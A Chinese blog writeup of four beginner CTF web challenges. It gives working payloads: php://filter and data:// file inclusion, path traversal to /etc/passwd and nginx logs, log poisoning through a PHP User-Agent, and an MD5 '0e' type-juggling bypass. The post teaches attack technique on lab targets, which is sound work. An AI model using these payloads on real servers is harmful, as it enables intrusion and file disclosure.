[青少年CTF]Web-CheckMe01-04 writeup by q1jun

已于 2022-11-29 10:49:44 修改
阅读量1.8k 收藏 6
点赞数 2
分类专栏: Web 文章标签: php nginx 服务器
于 2022-11-29 00:43:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ShangYaoPaiGu/article/details/128090156
版权

0x01 CheckMe01

进入环境,随意输入字符:

image-20221002121613125

看一下代码,发现$keys = base64_decode(urldecode($keys));

说明需要先将qsnctf字符进行base64编码才能使$keys=="qsnctf"判断成立。

image-20221002121753174

所以输入:

cXNuY3Rm

得到flag

image-20221002121844048

0x02 CheckMe02

打开题目的环境,发现是文件包含题:

image-20221002122324748

通过

?url=php://filter/read=convert.base64-encode/resource=index.php

php伪协议可以查看到index.php的源码的base64:

PHRpdGxlPkNoZWNrTWUtMDI8L3RpdGxlPg0KPD9waHANCnByaW50KCI8aDE+5qyi6L+O5p2l5YiwQ2hlY2tNZS0wMu+8jOW/q+adpeWvu+aJvuS9oOeahEZsYWflubbmj5DkuqTlkKfjgII8L2gxPiIpOw0KPz4NCjw/cGhwDQplcnJvcl9yZXBvcnRpbmcoMCk7DQokdXJsPSRfR0VUWyd1cmwnXTsNCmlmKGlzc2V0KCR1cmwpKXsNCiAgICBpbmNsdWRlKCR1cmwpOw0KfQ0KICAgIA0KPz4NCjxodG1sIGxhbmc9InpoLUNOIj4NCjw/cGhwDQogICAgICAgICAgICANCiAgICAgICAgICAgICRjb2RlPSI8P3BocCBpbmNsdWRlKCQiLiJfR0VUWyd1cmwnXSk7Pz4iOw0KICAgICAgICAgICAgaGlnaGxpZ2h0X3N0cmluZygkY29kZSk7DQogICAgPz4NCg==

解码得到:

<title>CheckMe-02</title>
<?php
print("<h1>欢迎来到CheckMe-02,快来寻找你的Flag并提交吧。</h1>");
?>
<?php
error_reporting(0);
$url=$_GET['url'];
if(isset($url)){
    include($url);
}

?>
<html lang="zh-CN">
<?php
            
            $code="<?php include($"."_GET['url']);?>";
            highlight_string($code);
    ?>

可以看出并没有做任何过滤,试试读取phpinfo():

?url=data:text/plain,<?php phpinfo();?>

image-20221002122920746

直接读取到FLAG。

0x03 CheckMe03

打开题目环境:

image-20221002123524270

还是文件包含题目,相比于CheckMe02这题把php伪协议过滤了。

但是还是可以读取到文件,比如/etc/passwd

?text=../../../etc/passwd

image-20221002123739090

那说明还可以通过日志来解析PHP语句。

根据nginx配置文件:

?text=../../../etc/nginx/nginx.conf

image-20221002123900075

可以推测access.log文件所在位置为/var/log/nginx/access.log,这个日志文件会记录http请求日志:

?text=../../../var/log/nginx/access.log

image-20221002124036248

所以通过发送一个包含<?php phpinfo();?>语句的http请求来写入access.log文件,这里就要用到burpsuite来拦截请求包,修改里面的User-Agent字段:

image-20221002124529654

然后再通过文件包含漏洞访问access.log日志文件:

image-20221002124615125

找到FLAG

image-20221002124646399

0x04 CheckMe04

打开题目环境:

image-20221002125008667

分析一下这段代码,变量a只能为字母,b只能为数字,然后他们各自的MD5值如果想等就输出flag。

这里通过0e截断可以做到,因为0e在是科学计数的语法,0e后面不管多大都是0

所以只需要找到两个0e开头的md5就行了

但不要忘了a只能是字母,b只能是数字:

a = QNKCDZO

md5(a) = 0e830400451993494058024219903391

b = 240610708

md5(b) = 0e462097431906509019562988736854

所以Payload:

http://xxx/?a=QNKCDZO&b=240610708

image-20221002125712512

q1jun
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ACTF2020 新生赛]Include 1
qq_51553814的博客
08-01 1455
[ACTF2020 新生赛]Include 1 首先看题目信息有个关键字include,我们就应该能猜到这题的主要考点是文件包含 进入靶场 一进去,就让我们点击,那么我们就点击瞅瞅吧 果然不出所料,url上面显眼的‘file=’就是我们想要的文件包含漏洞 以开始以为flag在其他漏洞,我先用file=php//input,再Post传参 但是当url后面接上file=php://input时,就直接给我返回了hacker页面,看来服务器是对input过滤了 那么就换一个方式,先用file=php:/
De1ctf 2020 -‘check in’ writeup
01-09
CTF(Capture The Flag)竞赛中,"De1ctf 2020 - ‘check in’" 是一道挑战性的安全题目,主要涉及到多个网络安全技术的综合运用,特别是与Web应用程序安全相关的方面。该题目的核心是通过理解并利用服务器配置中...
[青少年CTF]CheckMe04
明裕学长的博客
03-16 157
ctype_alpha()是一个检测函数,用来检测所给参数是不是字母的函数。is_numeric() 函数用于检测变量是否为数字或数字字符串。
一款超酷、功能强大的一体化网站测试工具:Web-Check!!!
最新发布
NHB456789的博客
05-16 400
Web-CheckWeb-Check 是一款功能强大的一体化工具,用于发现网站/主机的相关信息。用于检查网页的工具,用于确保网页的正确性和可访问性。它可以帮助开发人员和网站管理员检测网页中的错误和问题,并提供修复建议。它只需要输入一个网站就可以查看一个网站几乎所有信息,如 IP 信息、SSL、DNS记录、Cookies、域名信息、搜索爬行规则、服务器位置、重定向记录、开放端口、路由跟踪、DNS安全扩展、网站性能、关联主机名等。
青少年CTF-Web-CheckMe01
zxsctf的博客
10-09 1897
半颗星的简单题,CheckMe01启动题目,并访问。
[青少年 CTF] CheckMe01
piggcs的博客
04-03 180
分析该源码,我们需要传入字符串”qsnctf” 的 base64 加密字符串。“qsnctf” base64编码得到 “cXNuY3Rm”回到输入框输入cXNuY3Rm,有一个输入框,随便输入点什么。
青少年CTF_WEB
cfy2401926342的博客
01-17 490
青少年CTF_WEB
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
web-ctf-help:脚本集,以帮助基于Webctfs
02-24
Web-CTF-帮助描述一组简单的脚本(目前主要为抓取器),旨在帮助Web CTF。 查找图像源(和替代项),JavaScript源和注释。用法usage: webctf [-h] [-v] [--comments] [--scripts] [--images] [--headers] [--cookies...
青少年CTF平台-Web-PingME
zxsctf的博客
10-09 1541
题目难度一颗星,五十分。
[青少年CTF]Web—Easy CheckMe1-8 by 周末
个人文章分享
12-03 2297
web部分CheckMe1-8,仅供参考
青少年CTF平台-Web-POST&GET
zxsctf的博客
10-09 561
一星简单题,看我如何给你过了。启动环境,等待三十秒先喝口水。
青少年CTF训练平台-WEB-部分wp
SwBack的博客
04-04 2392
扫描发现备份文件 打开发现flag直接上传,然后获取flag木马地址,通过扫描目录发现。直接添加请求头user-agentt: zerodiumsystem(‘cat /flag’);连接之后,查找具有权限的命令根据提示直接发现flag 提示说明没有中文但是仍然错误,查看shadow,通过john破解密码 用户名后有$y,则表明密码已使用 yescrypt 进行哈希处理指定format参数 新手的登录 使用提示的user账号登录之后抓包修改cookie为admin。发包,得到flag访问之后直接查看js
青少年CTF训练平台 Web-Easy PingMe02
xingjinhao123的博客
10-22 1553
青少年CTF训练平台 Web-Easy PingMe02
青少年CTF平台 Web签到
zxsctf的博客
10-09 3983
Web一星简单题,Web签到。直接启动环境,等待30秒左右访问题目链接。
青少年CTF-Web-帝国CMS1-3通关记录
zxsctf的博客
12-08 1709
本次进通过平台内题目进行,非真实环境。 首先下发题目链接我们首先先找后台看看后台地址为随后,经过dirsearch进行扫描,得到了一个www.zip 访问扫描到的www.zip,得到网站源码使用D盾扫描,得到eval后门。蚁剑链接得到根目录的Flag这道题目和CMS01差不多,但是好像又有天差地别管理员发现你入侵了他的服务器,管理员修改了密码并删除了后门那么我们优先尝试管理员是不是给了一个弱口令经过弱口令爆破登陆成功密码为123456789这道题目考察了一个帝国CMS的漏洞利用,我们先看看帝国CMS03有什
{青少年CTF} Web签到 详解
lfc18950509270的博客
07-26 1169
又是除了几个字外一片空白,可能有的同学照例打开源代码看了起来,但是什么也没发现。这时候,我们可能就需要看一下它的目录下有没有什么文件里藏着flag。可以发现,扫描出目录下存在一个加index.php.bak的文件,直接复制到浏览器中,下载得到它,直接打开即可发现flag。至于它的安装和使用方法你们可以自己搜一下,或者你们需要在找个时间单独写一篇。这边使用的命令是dirsearch -u ,u指的就是url的意思。这样我们又有了一种思路可以拿到flag了,虽然也比较简单。进入之后可以看到是长这样的。
青少年ctf web unserialize
08-28
青少年 CTF(Capture The Flag)比赛是一个针对青少年的网络安全竞赛。在 CTF 中的 Web 题目中,可能会涉及到反序列化(unserialize)漏洞。 反序列化漏洞是一种常见的安全问题,它发生在将数据从序列化的状态(例如,通过网络传输或存储在文件中)还原为对象时。攻击者可以利用这种漏洞来执行恶意代码或绕过安全控制。 在 CTFWeb 反序列化题目中,你可能需要使用一些技巧来利用该漏洞。常见的一种方法是构造恶意数据,通过传递给 unserialize 函数来触发代码执行。 请注意,在真实的环境中,反序列化漏洞可能会导致严重的安全问题,请确保在合法授权和合法场景下进行研究和实践。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值